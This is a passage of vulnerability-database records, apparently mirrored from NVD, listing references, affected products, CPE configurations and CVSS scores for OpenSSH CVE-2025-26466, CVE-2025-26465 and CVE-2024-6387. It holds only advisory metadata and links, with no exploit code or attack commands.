"url": "http://seclists.org/fulldisclosure/2025/Feb/18"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2025/May/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2025/May/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1237041"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security-tracker.debian.org/tracker/CVE-2025-26466"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20250228-0002/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://ubuntu.com/security/CVE-2025-26466"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/4"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Third Party Advisory"
],
"url": "https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt"
}
],
"sourceIdentifier": "secalert@redhat.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "secalert@redhat.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "nvd@nist.gov",
"type": "Secondary"
}
]
}
FKIE_CVE-2025-26465
Vulnerability from fkie_nvd - Published: 2025-02-18 19:15 - Updated: 2025-11-03 22:186.8 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
| URL | Tags | ||
|---|---|---|---|
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2025:16823 | ||
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2025:3837 | ||
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2025:6993 | ||
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2025:8385 | ||
| secalert@redhat.com | https://access.redhat.com/security/cve/CVE-2025-26465 | Third Party Advisory | |
| secalert@redhat.com | https://access.redhat.com/solutions/7109879 | ||
| secalert@redhat.com | https://bugzilla.redhat.com/show_bug.cgi?id=2344780 | Issue Tracking, Third Party Advisory | |
| secalert@redhat.com | https://seclists.org/oss-sec/2025/q1/144 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2025/Feb/18 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2025/May/7 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2025/May/8 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://blog.qualys.com/vulnerabilities-threat-research/2025/02/18/qualys-tru-discovers-two-vulnerabilities-in-openssh-cve-2025-26465-cve-2025-26466 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://bugzilla.suse.com/show_bug.cgi?id=1237040 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://ftp.openbsd.org/pub/OpenBSD/patches/7.6/common/008_ssh.patch.sig | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2025/02/msg00020.html | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.mindrot.org/pipermail/openssh-unix-announce/2025-February/000161.html | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security-tracker.debian.org/tracker/CVE-2025-26465 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20250228-0003/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://ubuntu.com/security/CVE-2025-26465 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openssh.com/releasenotes.html#9.9p2 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openwall.com/lists/oss-security/2025/02/18/1 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openwall.com/lists/oss-security/2025/02/18/4 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.theregister.com/2025/02/18/openssh_vulnerabilities_mitm_dos/ | Press/Media Coverage | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.vicarius.io/vsociety/posts/cve-2025-26465-detect-vulnerable-openssh | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.vicarius.io/vsociety/posts/cve-2025-26465-mitigate-vulnerable-openssh | Mitigation, Third Party Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://seclists.org/oss-sec/2025/q1/144 | Mailing List, Third Party Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| openbsd | openssh | * | |
| openbsd | openssh | 6.8 | |
| openbsd | openssh | 9.9 | |
| openbsd | openssh | 9.9 | |
| netapp | active_iq_unified_manager | - | |
| netapp | ontap | 9 | |
| redhat | openshift_container_platform | 4.0 | |
| debian | debian_linux | 11.0 | |
| debian | debian_linux | 12.0 | |
| redhat | enterprise_linux | 9.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD9E4318-20E3-420F-8EF5-7C05C3386586",
"versionEndIncluding": "9.8",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*",
"matchCriteriaId": "50836FA3-8116-4D58-B73E-B4830FB3A551",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.9:-:*:*:*:*:*:*",
"matchCriteriaId": "E2B53BBB-6916-478C-A896-77C7F7E7D5DE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.9:p1:*:*:*:*:*:*",
"matchCriteriaId": "F7A2B794-BA83-4A01-BD2E-541F18CB9E37",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
"matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:ontap:9:*:*:*:*:*:*:*",
"matchCriteriaId": "A20333EE-4C13-426E-8B54-D78679D5DDB8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:12.0:*:*:*:*:*:*:*",
"matchCriteriaId": "46D69DCC-AE4D-4EA5-861C-D60951444C6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in OpenSSH when the VerifyHostKeyDNS option is enabled. A machine-in-the-middle attack can be performed by a malicious machine impersonating a legit server. This issue occurs due to how OpenSSH mishandles error codes in specific conditions when verifying the host key. For an attack to be considered successful, the attacker needs to manage to exhaust the client\u0027s memory resource first, turning the attack complexity high."
},
{
"lang": "es",
"value": "Se encontr\u00f3 una vulnerabilidad en OpenSSH cuando la opci\u00f3n VerifyHostKeyDNS est\u00e1 habilitada. Un ataque de m\u00e1quina en el medio puede ser realizado mediante una m\u00e1quina maliciosa que se hace pasar por un servidor leg\u00edtimo. Este problema ocurre debido a c\u00f3mo los c\u00f3digos de error de OpenSSH Mishandles en condiciones espec\u00edficas al verificar la clave del host. Para que un ataque se considere exitoso, el atacante debe lograr agotar el recurso de memoria del cliente primero, lo que gira la complejidad del ataque."
}
],
"id": "CVE-2025-26465",
"lastModified": "2025-11-03T22:18:41.727",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.2,
"source": "secalert@redhat.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-02-18T19:15:29.230",
"references": [
{
"source": "secalert@redhat.com",
"url": "https://access.redhat.com/errata/RHSA-2025:16823"
},
{
"source": "secalert@redhat.com",
"url": "https://access.redhat.com/errata/RHSA-2025:3837"
},
{
"source": "secalert@redhat.com",
"url": "https://access.redhat.com/errata/RHSA-2025:6993"
},
{
"source": "secalert@redhat.com",
"url": "https://access.redhat.com/errata/RHSA-2025:8385"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-26465"
},
{
"source": "secalert@redhat.com",
"url": "https://access.redhat.com/solutions/7109879"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2344780"
},
{
"source": "secalert@redhat.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/oss-sec/2025/q1/144"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2025/Feb/18"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2025/May/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2025/May/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://blog.qualys.com/vulnerabilities-threat-research/2025/02/18/qualys-tru-discovers-two-vulnerabilities-in-openssh-cve-2025-26465-cve-2025-26466"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1237040"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.6/common/008_ssh.patch.sig"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.mindrot.org/pipermail/openssh-unix-announce/2025-February/000161.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security-tracker.debian.org/tracker/CVE-2025-26465"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20250228-0003/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://ubuntu.com/security/CVE-2025-26465"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/releasenotes.html#9.9p2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage"
],
"url": "https://www.theregister.com/2025/02/18/openssh_vulnerabilities_mitm_dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-26465-detect-vulnerable-openssh"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mitigation",
"Third Party Advisory"
],
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-26465-mitigate-vulnerable-openssh"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/oss-sec/2025/q1/144"
}
],
"sourceIdentifier": "secalert@redhat.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-390"
}
],
"source": "secalert@redhat.com",
"type": "Secondary"
}
]
}
FKIE_CVE-2024-6387
Vulnerability from fkie_nvd - Published: 2024-07-01 13:15 - Updated: 2025-09-30 13:528.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
| URL | Tags | ||
|---|---|---|---|
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2024:4312 | Third Party Advisory | |
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2024:4340 | Third Party Advisory | |
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2024:4389 | Third Party Advisory | |
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2024:4469 | Third Party Advisory | |
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2024:4474 | Third Party Advisory | |
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2024:4479 | Third Party Advisory | |
| secalert@redhat.com | https://access.redhat.com/errata/RHSA-2024:4484 | Third Party Advisory | |
| secalert@redhat.com | https://access.redhat.com/security/cve/CVE-2024-6387 | Third Party Advisory | |
| secalert@redhat.com | https://bugzilla.redhat.com/show_bug.cgi?id=2294604 | Third Party Advisory | |
| secalert@redhat.com | https://santandersecurityresearch.github.io/blog/sshing_the_masses.html | Exploit, Third Party Advisory | |
| secalert@redhat.com | https://www.openssh.com/txt/release-9.8 | Release Notes, Third Party Advisory | |
| secalert@redhat.com | https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2024/Jul/18 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2024/Jul/19 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2024/Jul/20 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/01/12 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/01/13 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/02/1 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/03/1 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/03/11 | Exploit, Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/03/2 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/03/3 | Mailing List, Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/03/4 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/03/5 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/04/1 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/04/2 | Exploit, Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/08/2 | Exploit, Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/08/3 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/09/2 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/09/5 | Exploit, Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/10/1 | Exploit, Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/10/2 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/10/3 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/10/4 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/10/6 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/11/1 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/11/3 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/23/4 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/23/6 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/28/2 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/28/3 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/errata/RHSA-2024:4312 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/errata/RHSA-2024:4340 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/errata/RHSA-2024:4389 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/errata/RHSA-2024:4469 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/errata/RHSA-2024:4474 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/errata/RHSA-2024:4479 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/errata/RHSA-2024:4484 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/security/cve/CVE-2024-6387 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://arstechnica.com/security/2024/07/regresshion-vulnerability-in-openssh-gives-attackers-root-on-linux/ | Press/Media Coverage, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server | Press/Media Coverage, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://bugzilla.redhat.com/show_bug.cgi?id=2294604 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://explore.alas.aws.amazon.com/CVE-2024-6387.html | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://forum.vmssoftware.com/viewtopic.php?f=8&t=9132 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2024-002.txt.asc | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/AlmaLinux/updates/issues/629 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/Azure/AKS/issues/4379 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/PowerShell/Win32-OpenSSH/discussions/2248 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/PowerShell/Win32-OpenSSH/issues/2249 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/microsoft/azurelinux/issues/9555 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/openela-main/openssh/commit/e1f438970e5a337a17070a637c1b9e19697cad09 | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/oracle/oracle-linux/issues/149 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/rapier1/hpn-ssh/issues/87 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/zgzhang/cve-2024-6387-poc | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.almalinux.org/archives/list/announce@lists.almalinux.org/thread/23BF5BMGFVEVUI2WNVAGMLKT557EU7VY/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html | Mailing List, Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html | Mailing List, Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://news.ycombinator.com/item?id=40843778 | Issue Tracking, Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://packetstorm.news/files/id/190587/ | Broken Link | |
| af854a3a-2127-422b-91ae-364da2661108 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://santandersecurityresearch.github.io/blog/sshing_the_masses.html | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security-tracker.debian.org/tracker/CVE-2024-6387 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20240701-0001/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://sig-security.rocky.page/issues/CVE-2024-6387/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/ | Press/Media Coverage, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://support.apple.com/kb/HT214118 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://support.apple.com/kb/HT214119 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://support.apple.com/kb/HT214120 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://ubuntu.com/security/CVE-2024-6387 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://ubuntu.com/security/notices/USN-6859-1 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.akamai.com/blog/security-research/2024-openssh-vulnerability-regression-what-to-know-and-do | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.arista.com/en/support/advisories-notices/security-advisory/19904-security-advisory-0100 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/52269 | Exploit | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.freebsd.org/security/advisories/FreeBSD-SA-24:04.openssh.asc | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openssh.com/txt/release-9.8 | Release Notes, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.splunk.com/en_us/blog/security/cve-2024-6387-regresshion-vulnerability.html | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.suse.com/security/cve/CVE-2024-6387.html | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.theregister.com/2024/07/01/regresshion_openssh/ | Press/Media Coverage, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.vicarius.io/vsociety/posts/regresshion-an-openssh-regression-error-cve-2024-6387 | Exploit, Third Party Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | sma_6200_firmware | - | |
| sonicwall | sma_6200 | - | |
| sonicwall | sma_7200_firmware | - | |
| sonicwall | sma_7200 | - | |
| arista | eos | * | |
| canonical | ubuntu_linux | 23.10 | |
| canonical | ubuntu_linux | 24.04 | |
| almalinux | almalinux | 9.0 | |
| sonicwall | sma_6210_firmware | - | |
| sonicwall | sma_6210 | - | |
| sonicwall | sma_7210_firmware | - | |
| sonicwall | sma_7210 | - | |
| sonicwall | sma_8200v_firmware | - | |
| sonicwall | sma_8200v | - | |
| sonicwall | sra_ex_7000_firmware | - | |
| sonicwall | sra_ex_7000 | - | |
| netapp | a1k_firmware | - | |
| netapp | a1k | - | |
| netapp | a70_firmware | - | |
| netapp | a70 | - | |
| netapp | a90_firmware | - | |
| netapp | a90 | - | |
| netapp | a700s_firmware | - | |
| netapp | a700s | - | |
| netapp | 8300_firmware | - | |
| netapp | 8300 | - | |
| netapp | 8700_firmware | - | |
| netapp | 8700 | - | |
| netapp | a400_firmware | - | |
| netapp | a400 | - | |
| netapp | c400_firmware | - | |
| netapp | c400 | - | |
| netapp | a250_firmware | - | |
| netapp | a250 | - | |
| netapp | 500f_firmware | - | |
| netapp | 500f | - | |
| netapp | c250_firmware | - | |
| netapp | c250 | - | |
| netapp | a800_firmware | - | |
| netapp | a800 | - | |
| netapp | c800_firmware | - | |
| netapp | c800 | - | |
| netapp | a900_firmware | - | |
| netapp | a900 | - | |
| netapp | a9500_firmware | - | |
| netapp | a9500 | - | |
| netapp | c190_firmware | - | |
| netapp | c190 | - | |
| netapp | a150_firmware | - | |
| netapp | a150 | - | |
| netapp | a220_firmware | - | |
| netapp | a220 | - | |
| netapp | fas2720_firmware | - | |
| netapp | fas2720 | - | |
| netapp | fas2750_firmware | - | |
| netapp | fas2750 | - | |
| netapp | fas2820_firmware | - | |
| netapp | fas2820 | - | |
| netapp | bootstrap_os | - | |
| netapp | hci_compute_node | - | |
| apple | macos | * | |
| apple | macos | * | |
| apple | macos | * | |
| openbsd | openssh | * | |
| openbsd | openssh | * | |
| openbsd | openssh | 4.4 | |
| openbsd | openssh | 8.5 | |
| openbsd | openssh | 8.6 | |
| redhat | openshift_container_platform | 4.0 | |
| redhat | enterprise_linux | 9.0 | |
| redhat | enterprise_linux_eus | 9.4 | |
| redhat | enterprise_linux_for_arm_64 | 9.0_aarch64 | |
| redhat | enterprise_linux_for_arm_64_eus | 9.4_aarch64 | |
| redhat | enterprise_linux_for_ibm_z_systems | 9.0_s390x | |
| redhat | enterprise_linux_for_ibm_z_systems_eus | 9.4_s390x | |
| redhat | enterprise_linux_for_power_little_endian | 9.0_ppc64le | |
| redhat | enterprise_linux_for_power_little_endian_eus | 9.4_ppc64le | |
| redhat | enterprise_linux_server_aus | 9.4 | |
| suse | linux_enterprise_micro | 6.0 | |
| debian | debian_linux | 12.0 | |
| canonical | ubuntu_linux | 22.04 | |
| canonical | ubuntu_linux | 22.10 | |
| canonical | ubuntu_linux | 23.04 | |
| amazon | amazon_linux | 2023.0 | |
| netapp | active_iq_unified_manager | - | |
| netapp | e-series_santricity_os_controller | * | |
| netapp | ontap | 9 | |
| netapp | ontap_select_deploy_administration_utility | - | |
| netapp | ontap_tools | 9 | |
| netapp | ontap_tools | 10 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.2 | |
| freebsd | freebsd | 13.3 | |
| freebsd | freebsd | 13.3 | |
| freebsd | freebsd | 13.3 | |
| freebsd | freebsd | 13.3 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
